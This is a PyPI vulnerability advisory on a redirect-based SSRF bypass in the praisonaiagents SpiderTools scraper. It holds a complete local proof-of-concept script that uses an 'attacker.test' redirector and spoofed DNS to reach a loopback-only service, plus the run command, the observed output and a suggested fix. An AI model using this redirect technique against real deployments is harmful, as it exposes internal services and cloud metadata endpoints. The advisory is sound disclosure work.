PYSEC-2026-3531
Vulnerability from pysec - Published: 2026-07-23 11:41 - Updated: 2026-07-23 14:32SpiderTools redirect-target SSRF protection bypass
Summary
SpiderTools.scrape_page() validates the initial URL and rejects direct
loopback, private, link-local, metadata, and internal hostnames. It then calls
requests.Session.get() without disabling automatic redirects or validating
redirect Location targets.
Requests follows redirects by default for GET requests. A safe-looking public
URL can therefore pass _validate_url(), redirect to a blocked target such as
127.0.0.1 or 169.254.169.254, and have the redirected response body parsed
and returned by scrape_page().
The same sink is used by extract_links(), crawl(), and extract_text()
through their calls to scrape_page().
Affected component
src/praisonai-agents/praisonaiagents/tools/spider_tools.py
Tested affected:
v3.9.24/d08d98cav3.9.26/62472a23v4.6.56/d3c4a2afv4.6.57/e90d92231853161ad931f3498da57651a9f8b528- current main
2f9677abb2ea68eab864ee8b6a828fd0141612e1
No patched version is known at report time.
Root cause
Current main validates only the caller-supplied URL:
if not self._validate_url(url):
return {"error": f"Invalid or potentially dangerous URL: {url}"}
The fetch then uses Requests defaults:
response = session.get(
url,
timeout=timeout,
verify=verify_ssl
)
Because allow_redirects=False is not set, Requests follows a 3xx redirect to a
new destination that has not been checked by _validate_url() or
_host_is_blocked().
Proof of vulnerability
The PoV below is local-only and does not contact external infrastructure. It
starts a loopback-only internal service and a local redirector. During
PraisonAI's initial host validation, attacker.test is made to look like a
public address. During the actual HTTP request, it routes to the local
redirector, which returns 302 Location: http://127.0.0.1:<port>/secret.
Full PoV:
#!/usr/bin/env python3
"""Local PoV for SpiderTools redirect-target SSRF.
This uses only loopback services. The "attacker" hostname is treated as public
during PraisonAI's initial URL validation, then routed to a local redirector so
the PoV does not contact external infrastructure. The redirector points at a
loopback-only internal service. Vulnerable behavior is confirmed when
SpiderTools follows that redirect and returns the internal response body.
"""
from __future__ import annotations
import http.server
import importlib.util
import inspect
import os
import socket
import socketserver
import threading
from typing import Any
def _load_spider_tools_class():
module_file = os.environ.get("PRAISONAI_SPIDER_TOOLS_FILE")
if module_file:
spec = importlib.util.spec_from_file_location("pov_spider_tools", module_file)
if spec is None or spec.loader is None:
raise RuntimeError(f"Could not load spider_tools file: {module_file}")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
return module.SpiderTools
from praisonaiagents.tools.spider_tools import SpiderTools
return SpiderTools
class InternalHandler(http.server.BaseHTTPRequestHandler):
body = b"SPIDER-INTERNAL-SECRET"
def do_GET(self) -> None: # noqa: N802
self.server.hit = True # type: ignore[attr-defined]
self.send_response(200)
self.send_header("Content-Type", "text/html")
self.send_header("Content-Length", str(len(self.body)))
self.end_headers()
self.wfile.write(self.body)
def log_message(self, *_args: Any) -> None:
return
class RedirectHandler(http.server.BaseHTTPRequestHandler):
target = ""
def do_GET(self) -> None: # noqa: N802
self.server.hit = True # type: ignore[attr-defined]
self.send_response(302)
self.send_header("Location", self.target)
self.end_headers()
def log_message(self, *_args: Any) -> None:
return
def _called_from_spider_host_guard() -> bool:
return any(frame.function == "_host_is_blocked" for frame in inspect.stack())
def main() -> int:
os.environ.pop("ALLOW_LOCAL_CRAWL", None)
internal = socketserver.TCPServer(("127.0.0.1", 0), InternalHandler)
internal.hit = False # type: ignore[attr-defined]
internal_port = internal.server_address[1]
RedirectHandler.target = f"http://127.0.0.1:{internal_port}/secret"
redirect = socketserver.TCPServer(("127.0.0.1", 0), RedirectHandler)
redirect.hit = False # type: ignore[attr-defined]
redirect_port = redirect.server_address[1]
threading.Thread(target=internal.serve_forever, daemon=True).start()
threading.Thread(target=redirect.serve_forever, daemon=True).start()
original_getaddrinfo = socket.getaddrinfo
def fake_getaddrinfo(host: str, port: int, *args: Any, **kwargs: Any):
if host == "attacker.test":
if _called_from_spider_host_guard():
return [
(
socket.AF_INET,
socket.SOCK_STREAM,
6,
"",
("93.184.216.34", port),
)
]
return original_getaddrinfo("127.0.0.1", port, *args, **kwargs)
return original_getaddrinfo(host, port, *args, **kwargs)
tool = _load_spider_tools_class()()
socket.getaddrinfo = fake_getaddrinfo
try:
direct_control = tool.scrape_page(
f"http://127.0.0.1:{internal_port}/secret",
timeout=5,
)
redirect_result = tool.scrape_page(
f"http://attacker.test:{redirect_port}/go",
timeout=5,
)
vulnerable_redirect_hit = bool(redirect.hit) # type: ignore[attr-defined]
vulnerable_internal_hit = bool(internal.hit) # type: ignore[attr-defined]
redirect.hit = False # type: ignore[attr-defined]
internal.hit = False # type: ignore[attr-defined]
import requests
original_session_get = requests.Session.get
def no_redirect_get(self, url, **kwargs): # type: ignore[no-untyped-def]
kwargs.setdefault("allow_redirects", False)
return original_session_get(self, url, **kwargs)
requests.Session.get = no_redirect_get
try:
no_redirect_control = _load_spider_tools_class()().scrape_page(
f"http://attacker.test:{redirect_port}/go",
timeout=5,
)
finally:
requests.Session.get = original_session_get
no_redirect_redirect_hit = bool(redirect.hit) # type: ignore[attr-defined]
no_redirect_internal_hit = bool(internal.hit) # type: ignore[attr-defined]
finally:
socket.getaddrinfo = original_getaddrinfo
redirect.shutdown()
internal.shutdown()
redirect.server_close()
internal.server_close()
print("DIRECT_CONTROL:", direct_control)
print("REDIRECT_RESULT:", redirect_result)
print("REDIRECT_SERVER_HIT:", vulnerable_redirect_hit)
print("INTERNAL_SERVER_HIT:", vulnerable_internal_hit)
print("NO_REDIRECT_CONTROL:", no_redirect_control)
print("NO_REDIRECT_SERVER_HIT:", no_redirect_redirect_hit)
print("NO_REDIRECT_INTERNAL_HIT:", no_redirect_internal_hit)
if not isinstance(direct_control, dict) or "dangerous URL" not in str(direct_control):
raise SystemExit("control failed: direct loopback was not blocked")
if not isinstance(redirect_result, dict) or "error" in redirect_result:
raise SystemExit(f"bypass failed: unexpected result {redirect_result!r}")
if "SPIDER-INTERNAL-SECRET" not in str(redirect_result.get("content", "")):
raise SystemExit("bypass failed: internal body was not returned")
if not vulnerable_redirect_hit or not vulnerable_internal_hit:
raise SystemExit("bypass failed: expected local servers were not hit")
if not no_redirect_redirect_hit or no_redirect_internal_hit:
raise SystemExit("fix control failed: no-redirect mode reached internal service")
print("PRAI-CAND-004 CONFIRMED: SpiderTools follows a redirect to loopback")
return 0
if __name__ == "__main__":
raise SystemExit(main())
Run:
cd /Users/rexliu/Documents/GA\ code/REDit\ Deployment/stack/deploy
env PRAISONAI_SPIDER_TOOLS_FILE=/path/to/PraisonAI/src/praisonai-agents/praisonaiagents/tools/spider_tools.py \
uv run --with requests --with beautifulsoup4 --with lxml --python 3.11 \
poc_spider_tools_redirect_ssrf.py
Observed on current main:
DIRECT_CONTROL: {'error': 'Invalid or potentially dangerous URL: http://127.0.0.1:<port>/secret'}
REDIRECT_RESULT: {'url': 'http://attacker.test:<port>/go', 'status_code': 200, ... 'content': 'SPIDER-INTERNAL-SECRET', ...}
REDIRECT_SERVER_HIT: True
INTERNAL_SERVER_HIT: True
NO_REDIRECT_CONTROL: {'url': 'http://attacker.test:<port>/go', 'status_code': 302, ... 'Location': 'http://127.0.0.1:<port>/secret', ...}
NO_REDIRECT_SERVER_HIT: True
NO_REDIRECT_INTERNAL_HIT: False
PRAI-CAND-004 CONFIRMED: SpiderTools follows a redirect to loopback
The direct control proves direct loopback is blocked. The redirect result proves the same blocked destination is reached through a public-looking initial URL. The no-redirect control proves that disabling automatic redirects prevents the internal request while still receiving the external redirect response.
Why this is not intended behavior
The Spider Tools documentation says scrape_page, extract_links, crawl, and
extract_text refuse dangerous URLs before network requests. The documented
blocked classes include loopback, private/reserved IPs, link-local/cloud
metadata endpoints, internal TLDs, non-HTTP(S) schemes, and parser-smuggling
forms. The same page states the validation is always on for bundled spider tools
and does not require enable_security().
The current code also documents _validate_url() as URL validation "to prevent
SSRF attacks." A redirect to a loopback target bypasses that documented
protection.
Impact
An attacker who can influence a URL passed to scrape_page(),
extract_links(), crawl(), or extract_text() can cause the PraisonAI process
to request destinations that SpiderTools is designed to block.
Potential impact includes:
- reading loopback-only HTTP services;
- probing or reading private network services reachable from the PraisonAI host;
- reading link-local/cloud metadata endpoints if reachable in the deployment environment.
The PoV demonstrates returned response-body disclosure from a loopback-only service. This report does not claim arbitrary code execution or live cloud credential theft without deployment-specific evidence.
Severity
Suggested default severity: Moderate.
High severity may be appropriate for deployments where untrusted users can directly invoke SpiderTools through a network-facing agent, bot, API, or MCP service and sensitive internal or metadata services are reachable.
Suggested fix
Disable automatic redirects in scrape_page():
response = session.get(
url,
timeout=timeout,
verify=verify_ssl,
allow_redirects=False,
)
If redirects should remain supported, follow them manually and validate every
Location target before each hop using the same SSRF guard:
- require
httporhttps; - resolve and validate every redirect hostname;
- reject loopback, private, link-local, reserved, multicast, unspecified, internal, and metadata destinations;
- cap redirect count;
- apply the same safe fetch path to
scrape_page(),extract_links(),crawl(), andextract_text().
Regression tests should cover direct loopback rejection, public-to-loopback
redirect rejection, public-to-public redirects if supported, and all
scrape_page() callers.
| Name | purl | praisonaiagents | pkg:pypi/praisonaiagents |
|---|
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "praisonaiagents",
"purl": "pkg:pypi/praisonaiagents"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.6.59"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.0.1",
"0.0.10",
"0.0.100",
"0.0.101",
"0.0.102",
"0.0.103",
"0.0.104",
"0.0.105",
"0.0.106",
"0.0.107",
"0.0.108",
"0.0.109",
"0.0.11",
"0.0.110",
"0.0.111",
"0.0.112",
"0.0.113",
"0.0.114",
"0.0.115",
"0.0.116",
"0.0.117",
"0.0.118",
"0.0.119",
"0.0.12",
"0.0.120",
"0.0.121",
"0.0.122",
"0.0.123",
"0.0.124",
"0.0.125",
"0.0.126",
"0.0.127",
"0.0.128",
"0.0.129",
"0.0.13",
"0.0.130",
"0.0.131",
"0.0.132",
"0.0.133",
"0.0.134",
"0.0.135",
"0.0.136",
"0.0.137",
"0.0.138",
"0.0.139",
"0.0.14",
"0.0.140",
"0.0.141",
"0.0.142",
"0.0.143",
"0.0.144",
"0.0.145",
"0.0.146",
"0.0.147",
"0.0.148",
"0.0.149",
"0.0.15",
"0.0.150",
"0.0.151",
"0.0.152",
"0.0.153",
"0.0.154",
"0.0.155",
"0.0.156",
"0.0.157",
"0.0.158",
"0.0.159",
"0.0.16",
"0.0.160",
"0.0.161",
"0.0.162",
"0.0.163",
"0.0.164",
"0.0.165",
"0.0.166",
"0.0.167",
"0.0.168",
"0.0.169",
"0.0.17",
"0.0.170",
"0.0.171",
"0.0.172",
"0.0.173",
"0.0.174",
"0.0.175",
"0.0.176",
"0.0.177",
"0.0.178",
"0.0.179",
"0.0.18",
"0.0.180",
"0.0.181",
"0.0.182",
"0.0.183",
"0.0.184",
"0.0.185",
"0.0.187",
"0.0.188",
"0.0.189",
"0.0.19",
"0.0.190",
"0.0.191",
"0.0.192",
"0.0.193",
"0.0.194",
"0.0.195",
"0.0.196",
"0.0.197",
"0.0.198",
"0.0.199",
"0.0.2",
"0.0.20",
"0.0.21",
"0.0.22",
"0.0.23",
"0.0.24",
"0.0.25",
"0.0.26",
"0.0.27",
"0.0.28",
"0.0.29",
"0.0.3",
"0.0.30",
"0.0.31",
"0.0.32",
"0.0.33",
"0.0.34",
"0.0.35",
"0.0.36",
"0.0.37",
"0.0.38",
"0.0.39",
"0.0.4",
"0.0.40",
"0.0.41",
"0.0.42",
"0.0.43",
"0.0.44",
"0.0.45",
"0.0.46",
"0.0.47",
"0.0.48",
"0.0.49",
"0.0.5",
"0.0.50",
"0.0.51",
"0.0.52",
"0.0.53",
"0.0.54",
"0.0.56",
"0.0.57",
"0.0.58",
"0.0.59",
"0.0.6",
"0.0.60",
"0.0.61",
"0.0.62",
"0.0.63",
"0.0.64",
"0.0.65",
"0.0.66",
"0.0.67",
"0.0.68",
"0.0.69",
"0.0.7",
"0.0.70",
"0.0.71",
"0.0.72",
"0.0.73",
"0.0.74",
"0.0.75",
"0.0.76",
"0.0.77",
"0.0.78",
"0.0.79",
"0.0.8",
"0.0.80",
"0.0.81",
"0.0.82",
"0.0.83",
"0.0.84",
"0.0.85",
"0.0.86",
"0.0.87",
"0.0.88",
"0.0.89",
"0.0.9",
"0.0.90",
"0.0.91",
"0.0.92",
"0.0.93",
"0.0.94",
"0.0.95",
"0.0.96",
"0.0.97",
"0.0.98",
"0.0.99",
"0.1.0",
"0.1.1",
"0.1.10",
"0.1.11",
"0.1.12",
"0.1.13",
"0.1.14",
"0.1.15",
"0.1.16",
"0.1.17",
"0.1.18",
"0.1.19",
"0.1.2",
"0.1.20",
"0.1.21",
"0.1.22",
"0.1.23",
"0.1.24",
"0.1.25",
"0.1.26",
"0.1.27",
"0.1.3",
"0.1.4",
"0.1.5",
"0.1.6",
"0.1.7",
"0.1.8",
"0.1.9",
"0.10.0",
"0.10.1",
"0.10.10",
"0.10.2",
"0.10.3",
"0.10.4",
"0.10.5",
"0.10.6",
"0.10.7",
"0.10.8",
"0.10.9",
"0.11.0",
"0.11.1",
"0.11.10",
"0.11.11",
"0.11.12",
"0.11.13",
"0.11.14",
"0.11.15",
"0.11.16",
"0.11.17",
"0.11.18",
"0.11.19",
"0.11.2",
"0.11.20",
"0.11.21",
"0.11.22",
"0.11.23",
"0.11.24",
"0.11.25",
"0.11.27",
"0.11.28",
"0.11.29",
"0.11.3",
"0.11.30",
"0.11.31",
"0.11.4",
"0.11.5",
"0.11.6",
"0.11.7",
"0.11.8",
"0.11.9",
"0.12.0",
"0.12.1",
"0.12.10",
"0.12.11",
"0.12.12",
"0.12.13",
"0.12.14",
"0.12.15",
"0.12.16",
"0.12.17",
"0.12.18",
"0.12.19",
"0.12.2",
"0.12.20",
"0.12.21",
"0.12.3",
"0.12.4",
"0.12.5",
"0.12.6",
"0.12.7",
"0.12.8",
"0.12.9",
"0.13.0",
"0.13.1",
"0.13.10",
"0.13.11",
"0.13.12",
"0.13.13",
"0.13.14",
"0.13.15",
"0.13.16",
"0.13.17",
"0.13.18",
"0.13.19",
"0.13.2",
"0.13.20",
"0.13.21",
"0.13.22",
"0.13.23",
"0.13.3",
"0.13.4",
"0.13.5",
"0.13.6",
"0.13.7",
"0.13.8",
"0.13.9",
"0.14.0",
"0.14.1",
"0.14.10",
"0.14.11",
"0.14.12",
"0.14.14",
"0.14.15",
"0.14.16",
"0.14.2",
"0.14.3",
"0.14.4",
"0.14.5",
"0.14.6",
"0.14.7",
"0.14.8",
"0.14.9",
"0.15.0",
"0.15.1",
"0.15.2",
"0.15.3",
"0.2.0",
"0.2.1",
"0.2.2",
"0.3.0",
"0.3.1",
"0.3.2",
"0.3.3",
"0.3.4",
"0.4.0",
"0.4.1",
"0.5.0",
"0.5.1",
"0.5.2",
"0.5.3",
"0.6.0",
"0.6.1",
"0.6.2",
"0.6.3",
"0.6.4",
"0.6.5",
"0.6.6",
"0.6.7",
"0.6.8",
"0.7.0",
"0.7.1",
"0.8.0",
"0.8.1",
"0.9.0",
"0.9.1",
"1.0.0",
"1.1.0",
"1.2.0",
"1.2.1",
"1.2.2",
"1.2.3",
"1.2.4",
"1.3.0",
"1.3.1",
"1.4.0",
"1.4.1",
"1.4.2",
"1.4.3",
"1.4.4",
"1.4.5",
"1.4.6",
"1.4.7",
"1.4.8",
"1.5.0",
"1.5.1",
"1.5.10",
"1.5.100",
"1.5.101",
"1.5.102",
"1.5.103",
"1.5.104",
"1.5.105",
"1.5.106",
"1.5.107",
"1.5.108",
"1.5.109",
"1.5.11",
"1.5.110",
"1.5.111",
"1.5.112",
"1.5.113",
"1.5.114",
"1.5.115",
"1.5.116",
"1.5.117",
"1.5.118",
"1.5.119",
"1.5.12",
"1.5.120",
"1.5.121",
"1.5.122",
"1.5.123",
"1.5.124",
"1.5.125",
"1.5.126",
"1.5.127",
"1.5.128",
"1.5.129",
"1.5.13",
"1.5.130",
"1.5.131",
"1.5.132",
"1.5.133",
"1.5.134",
"1.5.135",
"1.5.136",
"1.5.137",
"1.5.138",
"1.5.139",
"1.5.14",
"1.5.140",
"1.5.141",
"1.5.142",
"1.5.143",
"1.5.144",
"1.5.145",
"1.5.146",
"1.5.147",
"1.5.148",
"1.5.149",
"1.5.15",
"1.5.16",
"1.5.17",
"1.5.18",
"1.5.19",
"1.5.2",
"1.5.20",
"1.5.21",
"1.5.22",
"1.5.23",
"1.5.24",
"1.5.25",
"1.5.26",
"1.5.27",
"1.5.28",
"1.5.29",
"1.5.3",
"1.5.30",
"1.5.31",
"1.5.32",
"1.5.33",
"1.5.34",
"1.5.35",
"1.5.36",
"1.5.37",
"1.5.38",
"1.5.39",
"1.5.40",
"1.5.41",
"1.5.42",
"1.5.43",
"1.5.44",
"1.5.45",
"1.5.46",
"1.5.47",
"1.5.48",
"1.5.49",
"1.5.5",
"1.5.50",
"1.5.51",
"1.5.52",
"1.5.53",
"1.5.54",
"1.5.55",
"1.5.56",
"1.5.57",
"1.5.58",
"1.5.59",
"1.5.6",
"1.5.60",
"1.5.61",
"1.5.62",
"1.5.63",
"1.5.64",
"1.5.65",
"1.5.66",
"1.5.67",
"1.5.68",
"1.5.69",
"1.5.7",
"1.5.70",
"1.5.71",
"1.5.72",
"1.5.73",
"1.5.74",
"1.5.75",
"1.5.76",
"1.5.77",
"1.5.78",
"1.5.79",
"1.5.8",
"1.5.80",
"1.5.81",
"1.5.82",
"1.5.83",
"1.5.84",
"1.5.85",
"1.5.86",
"1.5.87",
"1.5.88",
"1.5.89",
"1.5.9",
"1.5.90",
"1.5.91",
"1.5.92",
"1.5.93",
"1.5.94",
"1.5.95",
"1.5.96",
"1.5.97",
"1.5.98",
"1.5.99",
"1.6.1",
"1.6.10",
"1.6.11",
"1.6.12",
"1.6.13",
"1.6.14",
"1.6.15",
"1.6.16",
"1.6.17",
"1.6.18",
"1.6.19",
"1.6.2",
"1.6.20",
"1.6.21",
"1.6.22",
"1.6.23",
"1.6.24",
"1.6.25",
"1.6.26",
"1.6.27",
"1.6.28",
"1.6.29",
"1.6.3",
"1.6.30",
"1.6.31",
"1.6.32",
"1.6.33",
"1.6.34",
"1.6.35",
"1.6.36",
"1.6.37",
"1.6.38",
"1.6.39",
"1.6.4",
"1.6.40",
"1.6.41",
"1.6.42",
"1.6.43",
"1.6.44",
"1.6.45",
"1.6.46",
"1.6.47",
"1.6.48",
"1.6.5",
"1.6.50",
"1.6.51",
"1.6.52",
"1.6.53",
"1.6.54",
"1.6.55",
"1.6.56",
"1.6.57",
"1.6.58",
"1.6.6",
"1.6.7",
"1.6.8",
"1.6.9"
]
}
],
"aliases": [
"CVE-2026-57115",
"GHSA-6h9p-93hq-q7h6"
],
"details": "# SpiderTools redirect-target SSRF protection bypass\n\n## Summary\n\n`SpiderTools.scrape_page()` validates the initial URL and rejects direct\nloopback, private, link-local, metadata, and internal hostnames. It then calls\n`requests.Session.get()` without disabling automatic redirects or validating\nredirect `Location` targets.\n\nRequests follows redirects by default for GET requests. A safe-looking public\nURL can therefore pass `_validate_url()`, redirect to a blocked target such as\n`127.0.0.1` or `169.254.169.254`, and have the redirected response body parsed\nand returned by `scrape_page()`.\n\nThe same sink is used by `extract_links()`, `crawl()`, and `extract_text()`\nthrough their calls to `scrape_page()`.\n\n## Affected component\n\n```text\nsrc/praisonai-agents/praisonaiagents/tools/spider_tools.py\n```\n\nTested affected:\n\n- `v3.9.24` / `d08d98ca`\n- `v3.9.26` / `62472a23`\n- `v4.6.56` / `d3c4a2af`\n- `v4.6.57` / `e90d92231853161ad931f3498da57651a9f8b528`\n- current main `2f9677abb2ea68eab864ee8b6a828fd0141612e1`\n\nNo patched version is known at report time.\n\n## Root cause\n\nCurrent main validates only the caller-supplied URL:\n\n```python\nif not self._validate_url(url):\n return {\"error\": f\"Invalid or potentially dangerous URL: {url}\"}\n```\n\nThe fetch then uses Requests defaults:\n\n```python\nresponse = session.get(\n url,\n timeout=timeout,\n verify=verify_ssl\n)\n```\n\nBecause `allow_redirects=False` is not set, Requests follows a 3xx redirect to a\nnew destination that has not been checked by `_validate_url()` or\n`_host_is_blocked()`.\n\n## Proof of vulnerability\n\nThe PoV below is local-only and does not contact external infrastructure. It\nstarts a loopback-only internal service and a local redirector. During\nPraisonAI\u0027s initial host validation, `attacker.test` is made to look like a\npublic address. During the actual HTTP request, it routes to the local\nredirector, which returns `302 Location: http://127.0.0.1:\u003cport\u003e/secret`.\n\nFull PoV:\n\n```python\n#!/usr/bin/env python3\n\"\"\"Local PoV for SpiderTools redirect-target SSRF.\n\nThis uses only loopback services. The \"attacker\" hostname is treated as public\nduring PraisonAI\u0027s initial URL validation, then routed to a local redirector so\nthe PoV does not contact external infrastructure. The redirector points at a\nloopback-only internal service. Vulnerable behavior is confirmed when\nSpiderTools follows that redirect and returns the internal response body.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport http.server\nimport importlib.util\nimport inspect\nimport os\nimport socket\nimport socketserver\nimport threading\nfrom typing import Any\n\n\ndef _load_spider_tools_class():\n module_file = os.environ.get(\"PRAISONAI_SPIDER_TOOLS_FILE\")\n if module_file:\n spec = importlib.util.spec_from_file_location(\"pov_spider_tools\", module_file)\n if spec is None or spec.loader is None:\n raise RuntimeError(f\"Could not load spider_tools file: {module_file}\")\n module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(module)\n return module.SpiderTools\n\n from praisonaiagents.tools.spider_tools import SpiderTools\n\n return SpiderTools\n\n\nclass InternalHandler(http.server.BaseHTTPRequestHandler):\n body = b\"SPIDER-INTERNAL-SECRET\"\n\n def do_GET(self) -\u003e None: # noqa: N802\n self.server.hit = True # type: ignore[attr-defined]\n self.send_response(200)\n self.send_header(\"Content-Type\", \"text/html\")\n self.send_header(\"Content-Length\", str(len(self.body)))\n self.end_headers()\n self.wfile.write(self.body)\n\n def log_message(self, *_args: Any) -\u003e None:\n return\n\n\nclass RedirectHandler(http.server.BaseHTTPRequestHandler):\n target = \"\"\n\n def do_GET(self) -\u003e None: # noqa: N802\n self.server.hit = True # type: ignore[attr-defined]\n self.send_response(302)\n self.send_header(\"Location\", self.target)\n self.end_headers()\n\n def log_message(self, *_args: Any) -\u003e None:\n return\n\n\ndef _called_from_spider_host_guard() -\u003e bool:\n return any(frame.function == \"_host_is_blocked\" for frame in inspect.stack())\n\n\ndef main() -\u003e int:\n os.environ.pop(\"ALLOW_LOCAL_CRAWL\", None)\n\n internal = socketserver.TCPServer((\"127.0.0.1\", 0), InternalHandler)\n internal.hit = False # type: ignore[attr-defined]\n internal_port = internal.server_address[1]\n\n RedirectHandler.target = f\"http://127.0.0.1:{internal_port}/secret\"\n redirect = socketserver.TCPServer((\"127.0.0.1\", 0), RedirectHandler)\n redirect.hit = False # type: ignore[attr-defined]\n redirect_port = redirect.server_address[1]\n\n threading.Thread(target=internal.serve_forever, daemon=True).start()\n threading.Thread(target=redirect.serve_forever, daemon=True).start()\n\n original_getaddrinfo = socket.getaddrinfo\n\n def fake_getaddrinfo(host: str, port: int, *args: Any, **kwargs: Any):\n if host == \"attacker.test\":\n if _called_from_spider_host_guard():\n return [\n (\n socket.AF_INET,\n socket.SOCK_STREAM,\n 6,\n \"\",\n (\"93.184.216.34\", port),\n )\n ]\n return original_getaddrinfo(\"127.0.0.1\", port, *args, **kwargs)\n return original_getaddrinfo(host, port, *args, **kwargs)\n\n tool = _load_spider_tools_class()()\n socket.getaddrinfo = fake_getaddrinfo\n try:\n direct_control = tool.scrape_page(\n f\"http://127.0.0.1:{internal_port}/secret\",\n timeout=5,\n )\n redirect_result = tool.scrape_page(\n f\"http://attacker.test:{redirect_port}/go\",\n timeout=5,\n )\n vulnerable_redirect_hit = bool(redirect.hit) # type: ignore[attr-defined]\n vulnerable_internal_hit = bool(internal.hit) # type: ignore[attr-defined]\n\n redirect.hit = False # type: ignore[attr-defined]\n internal.hit = False # type: ignore[attr-defined]\n\n import requests\n\n original_session_get = requests.Session.get\n\n def no_redirect_get(self, url, **kwargs): # type: ignore[no-untyped-def]\n kwargs.setdefault(\"allow_redirects\", False)\n return original_session_get(self, url, **kwargs)\n\n requests.Session.get = no_redirect_get\n try:\n no_redirect_control = _load_spider_tools_class()().scrape_page(\n f\"http://attacker.test:{redirect_port}/go\",\n timeout=5,\n )\n finally:\n requests.Session.get = original_session_get\n no_redirect_redirect_hit = bool(redirect.hit) # type: ignore[attr-defined]\n no_redirect_internal_hit = bool(internal.hit) # type: ignore[attr-defined]\n finally:\n socket.getaddrinfo = original_getaddrinfo\n redirect.shutdown()\n internal.shutdown()\n redirect.server_close()\n internal.server_close()\n\n print(\"DIRECT_CONTROL:\", direct_control)\n print(\"REDIRECT_RESULT:\", redirect_result)\n print(\"REDIRECT_SERVER_HIT:\", vulnerable_redirect_hit)\n print(\"INTERNAL_SERVER_HIT:\", vulnerable_internal_hit)\n print(\"NO_REDIRECT_CONTROL:\", no_redirect_control)\n print(\"NO_REDIRECT_SERVER_HIT:\", no_redirect_redirect_hit)\n print(\"NO_REDIRECT_INTERNAL_HIT:\", no_redirect_internal_hit)\n\n if not isinstance(direct_control, dict) or \"dangerous URL\" not in str(direct_control):\n raise SystemExit(\"control failed: direct loopback was not blocked\")\n if not isinstance(redirect_result, dict) or \"error\" in redirect_result:\n raise SystemExit(f\"bypass failed: unexpected result {redirect_result!r}\")\n if \"SPIDER-INTERNAL-SECRET\" not in str(redirect_result.get(\"content\", \"\")):\n raise SystemExit(\"bypass failed: internal body was not returned\")\n if not vulnerable_redirect_hit or not vulnerable_internal_hit:\n raise SystemExit(\"bypass failed: expected local servers were not hit\")\n if not no_redirect_redirect_hit or no_redirect_internal_hit:\n raise SystemExit(\"fix control failed: no-redirect mode reached internal service\")\n\n print(\"PRAI-CAND-004 CONFIRMED: SpiderTools follows a redirect to loopback\")\n return 0\n\n\nif __name__ == \"__main__\":\n raise SystemExit(main())\n```\n\nRun:\n\n```fish\ncd /Users/rexliu/Documents/GA\\ code/REDit\\ Deployment/stack/deploy\nenv PRAISONAI_SPIDER_TOOLS_FILE=/path/to/PraisonAI/src/praisonai-agents/praisonaiagents/tools/spider_tools.py \\\n uv run --with requests --with beautifulsoup4 --with lxml --python 3.11 \\\n poc_spider_tools_redirect_ssrf.py\n```\n\nObserved on current main:\n\n```text\nDIRECT_CONTROL: {\u0027error\u0027: \u0027Invalid or potentially dangerous URL: http://127.0.0.1:\u003cport\u003e/secret\u0027}\nREDIRECT_RESULT: {\u0027url\u0027: \u0027http://attacker.test:\u003cport\u003e/go\u0027, \u0027status_code\u0027: 200, ... \u0027content\u0027: \u0027SPIDER-INTERNAL-SECRET\u0027, ...}\nREDIRECT_SERVER_HIT: True\nINTERNAL_SERVER_HIT: True\nNO_REDIRECT_CONTROL: {\u0027url\u0027: \u0027http://attacker.test:\u003cport\u003e/go\u0027, \u0027status_code\u0027: 302, ... \u0027Location\u0027: \u0027http://127.0.0.1:\u003cport\u003e/secret\u0027, ...}\nNO_REDIRECT_SERVER_HIT: True\nNO_REDIRECT_INTERNAL_HIT: False\nPRAI-CAND-004 CONFIRMED: SpiderTools follows a redirect to loopback\n```\n\nThe direct control proves direct loopback is blocked. The redirect result proves\nthe same blocked destination is reached through a public-looking initial URL.\nThe no-redirect control proves that disabling automatic redirects prevents the\ninternal request while still receiving the external redirect response.\n\n## Why this is not intended behavior\n\nThe Spider Tools documentation says `scrape_page`, `extract_links`, `crawl`, and\n`extract_text` refuse dangerous URLs before network requests. The documented\nblocked classes include loopback, private/reserved IPs, link-local/cloud\nmetadata endpoints, internal TLDs, non-HTTP(S) schemes, and parser-smuggling\nforms. The same page states the validation is always on for bundled spider tools\nand does not require `enable_security()`.\n\nThe current code also documents `_validate_url()` as URL validation \"to prevent\nSSRF attacks.\" A redirect to a loopback target bypasses that documented\nprotection.\n\n## Impact\n\nAn attacker who can influence a URL passed to `scrape_page()`,\n`extract_links()`, `crawl()`, or `extract_text()` can cause the PraisonAI process\nto request destinations that SpiderTools is designed to block.\n\nPotential impact includes:\n\n- reading loopback-only HTTP services;\n- probing or reading private network services reachable from the PraisonAI host;\n- reading link-local/cloud metadata endpoints if reachable in the deployment\n environment.\n\nThe PoV demonstrates returned response-body disclosure from a loopback-only\nservice. This report does not claim arbitrary code execution or live cloud\ncredential theft without deployment-specific evidence.\n\n## Severity\n\nSuggested default severity: Moderate.\n\nHigh severity may be appropriate for deployments where untrusted users can\ndirectly invoke SpiderTools through a network-facing agent, bot, API, or MCP\nservice and sensitive internal or metadata services are reachable.\n\n## Suggested fix\n\nDisable automatic redirects in `scrape_page()`:\n\n```python\nresponse = session.get(\n url,\n timeout=timeout,\n verify=verify_ssl,\n allow_redirects=False,\n)\n```\n\nIf redirects should remain supported, follow them manually and validate every\n`Location` target before each hop using the same SSRF guard:\n\n- require `http` or `https`;\n- resolve and validate every redirect hostname;\n- reject loopback, private, link-local, reserved, multicast, unspecified,\n internal, and metadata destinations;\n- cap redirect count;\n- apply the same safe fetch path to `scrape_page()`, `extract_links()`,\n `crawl()`, and `extract_text()`.\n\nRegression tests should cover direct loopback rejection, public-to-loopback\nredirect rejection, public-to-public redirects if supported, and all\n`scrape_page()` callers.",
"id": "PYSEC-2026-3531",
"modified": "2026-07-23T14:32:41.535261Z",
"published": "2026-07-23T11:41:40.989178Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6h9p-93hq-q7h6"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
},
{
"type": "PACKAGE",
"url": "https://pypi.org/project/praisonaiagents"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-6h9p-93hq-q7h6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57115"
}
],
"severity": [
{
